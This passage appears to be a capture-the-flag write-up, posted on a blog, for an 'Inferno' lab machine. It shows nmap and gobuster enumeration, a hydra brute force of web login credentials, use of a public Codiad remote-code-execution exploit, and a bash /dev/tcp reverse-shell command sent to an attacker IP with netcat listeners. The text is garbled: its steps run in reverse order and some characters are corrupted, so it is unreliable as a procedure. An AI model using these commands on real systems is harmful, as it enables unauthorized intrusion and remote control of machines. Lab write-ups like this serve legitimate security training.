Login failed! Please check your username and password. Please execute the following command on your vps:Įcho 'bash -c "bash -i >/dev/tcp/10.9.149.180/1235 0>&1 2>&1"' | nc -lnvp 1234 nc -lnvp 1235 Please confirm that you have done the two command above yĬredentials (e.g., bad password ), or yourīrowser doesn 't understand how to supplyĪpache/2.4.29 (Ubuntu ) Server at 10.10.241.114 Port 80 Clone this repository with git clone and follow the instructions. This exploit let us execute system command on Codiad to get a reverse shell. We found Github repository with RCE (Remote Code Execute) Exploit for Codiad. Proceed with searching for “codiad exploit”. Searching for Codiad we will find that it is a web-based IDE framework. Using obtained password along with username for required authentication redirects us to another login form, where we will once again use the same credentials. host: 10.10.241.114 login: admin password: Īfter few minutes valid set of credentials is found. Hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.10.241.114 -m /inferno http-get We will try to brute force authentication with hydra and custom user list consisting of following usernames: Navigating to /inferno we are prompted to authenticate. Expanded: true Timeout: 10s = 6 13:23:36 Starting gobuster = /index.html (Status: 200 ) /inferno (Status: 401 ) /server-status (Status: 403 ) Threads: 10 Wordlist: /usr/share/wordlists/dirbuster/ = Gobuster v3.0.1īy OJ Reeves ) & Christian Mehlmauer ) = Url: Gobuster dir -e -u -w /usr/share/wordlists/dirbuster/ -x. Nothing interesting can be found in the page source. We are welcome with Map of Hell by Botticelli inspired by Dante’s Divine Comedy. No exact OS matches for host (If you know what OS is running on it, see ).Īnalyzing the output we will find that only two ports are legitimate, 22 (ssh) and 80 (http).īecause we don’t have ssh credentials yet, let’s visit port 80 in our browser. |_finger: ERROR: Script execution failed (use -d to debug ) 2121/tcp open ccproxy-ftp? |_http-server-header: Apache/2.4.29 (Ubuntu) |_ Supported Methods: POST OPTIONS HEAD GET |_smtp-commands: Couldn 't establish connection on port 25Ĩ0/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux protocol 2.0 ) | ssh-hostkey:
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |